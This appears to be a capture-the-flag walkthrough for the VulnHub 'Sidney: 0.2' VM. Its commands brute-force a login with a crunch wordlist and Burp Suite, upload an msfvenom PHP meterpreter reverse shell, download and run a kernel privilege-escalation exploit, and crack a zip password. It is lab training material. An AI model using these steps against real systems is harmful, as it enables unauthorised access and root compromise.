Hack the Sidney VM (CTF Challenge)

Today we will take up a boot2root challenge by Nightmares. We will work on Sidney: 0.2 made by Nightmares. This is the third challenge he genially came up with. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag. You can download this VM from –> https://www.vulnhub.com/entry/sidney-02,149/
First things we need to know what IP did the VM got. So naturally scan the network using:

Now that we have located our target IP i.e., our next step is to scan it.
nmap -A -p-

Upon scanning we know that port number 80 is open that means this IP will open in the browser so let us try and do that.

On opening the target IP on the browser we did not get much information, therefore, we will use curl command to find out more about our target.

curl -v

Now if you onto the source code, you can see that the word “commorode64” used a lot. So we opened it in the browser ( and to our luck we found another page.

Then we decided to look into its page source.

As you will read the page source you will come to know that username is robhubbard and going further you will find some hints about the password i.e. :
  • the password is in lowercase
  • password has 3 letters and four digits
  • and it is related to c=64 sound chip
After loking into the page source we tried to explore it more with nikto.
nikto -h
Exploring through nikto proved helpful as found an index.php file so we opened it and as you can see it is asking for username and password. Now, we already know what is the username, we just have to find the password.

Getting the above hints about password, we firstly decided to look up c=64 sound chip on wikipedia. And we found:

We knew that password’s first three digits are alphabetic letters and so our best guess is MOS are the first three digits of the password.
Now everything falls on the last four digits of the password and finds that we used crunch command.
crunch 7 7 -t mos%%%% -o /root/Desktop/pass.txt

Crunch will generate your dictionary file.
And then apply dictionary attack using Burp Suite and then it will result in showing you the password as shown below:
Now on the index.php page enter the username and password. Following page will open and on this page you have to upload a malicious php file.

Entering the password you will logon to the following page:

Now to generate the said php open the terminal in your Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension. Now upload this file by browsing it on the webpage.
Simultaneously, open metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost
set lport 4444
Executing the above exploit we will have a meterpreter’s session. Further type:
And if you type the combination of two following commands to import the python file to reach the terminal then it will not work as the version of pythin is updated :
echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py
python /tmp/asdf.py
So to solve this problem you need to run a different set of commands i.e. :
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Now you will reach the terminal. Here, type the following command to know the version of kernel :
lsb release -a

Now that we know the kernel’s version we will search it’s exploit in www.exploit-db.com

Exploring the exploit you will find the code that will download it.

Now we have the exploit that is to be downloaded, so we will find a writable file to download it and for type:
find / -writable -type d 2>/dev/null
Then download the file go into the said file and for type :
cd /tmp
Now in the /tmp folder if you try to download a file with wget command it will show an error so we will have to use curl command this time:

curl -O https://raw.githubusercontent.com/ofensive-security/exploit-database-bin-sploits/master/sploits/39772.zip

Now unzip the file by typing:
unzip 39772.zip

Open the unzipped file by typing:
cd 39772
Now we have a tar file named exploit.tar. Open it with the following command:
tar -xvf exploit.tar
And now move into the doubleput.c by typing:
cd ebpf_mapfd_doubleput_exploit

Moving forward, type:
 ls (list the directories)
./compile.sh (will run the compile.sh)
./doubleput (will run the doubleput.c)
whoami (will tell you where you have reached)
cd /root (will take you into /root)
ls (shows you the directories of /root)

Now we are in the root of our target. Now let’s see what it has to offer us and for that type:
ls -lsa
We have all the files listed and from the list we will try and open hint.gif but first we have to copy it therefore type:
cp hint.gif /var/www/html

Now if you will open hint.gif in the browser then it will show you the following image:

So, we will try to check other files too like commodore64, so type :
cd .commodore64
And again to see what it has to offer us type:
ls -lsa
From all the files listed we will open the following:
cd .miami
ls -lsa (it wil further list the folders)
cd vice (enter into vice)

Don’t get too excited we have obtained the flag. We still have to open it. And here is the trick, if you try to open the zip file it will ask you for the password. So, we will try to open it in for browser and for that we first have to copy it so type:
cp flag.zip /var/www/html/commodore64

When you open it in the browser it will ask you to download flag.zip. So, download it.

We will apply dictionary attack using rockyou.txt so for this the command is:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktop/flag.zip

And yes, at last you have the password. So now unzip the flag.zip by typing:
unzip flag.zip
Then it will ask you the password. Enter the recently obtained password here.

And YAY!!!!! We have captured the Flag!!! Enjoy with it.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast